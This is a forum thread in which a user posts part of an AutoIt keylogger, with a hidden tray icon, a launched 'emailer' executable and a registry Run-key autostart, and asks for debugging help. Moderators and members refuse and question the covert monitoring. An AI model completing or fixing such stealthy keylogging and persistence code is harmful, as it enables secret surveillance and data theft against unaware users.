keylogger script need help

sumkid

ok so i made myself a keylogger for the purpose of watching what my kids do on the computer. i have this part of the source code

#include <Misc.au3>
#NoTrayIcon

$omfg = @ScriptDir
$ROFL = @ScriptName
run( "background.EXE", $omfg )

RegWrite( "HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Sx_erud","REG_SZ", $omfg & $ROFL )

when i run it i get an error saying "Error parsing function call" anyone that can tell me what that means?

PS: i hid the rest of the code for the sake of the community

PPS: background.exe is the emailer

Edited by sumkid

• Moderators

anyone, help?

Regardless of your intentions, you won't get help on key loggers here. If you want to make one, then the only help you'll get is with the search function.

Common sense plays a role in the basics of understanding AutoIt... If you're lacking in that, do us all a favor, and step away from the computer.

because not all people make key loggers to do good things. And the bad programs get autoit black listed by anti virus programs. You could have simply asked help with that part of your code. Or see if others have made them, and pmed them. I also find it kinda funny that "sumkid" has kids.

• Moderators

why would i not get help? its for my use only and i didnt post the source. i just dont understand what it means "Error parsing function call"

You probably tried to use more (or less) parameters than allowed.

Common sense plays a role in the basics of understanding AutoIt... If you're lacking in that, do us all a favor, and step away from the computer.

ok so i made myself a keylogger for the purpose of watching what my kids do on the computer. i have this part of the source code

This may sound harsh, but have you tried watching your child or spending quality time and educating them instead of spying on them?

Agreement is not necessary - thinking for one's self is!

My-Colors.jpg

cuniform2.gif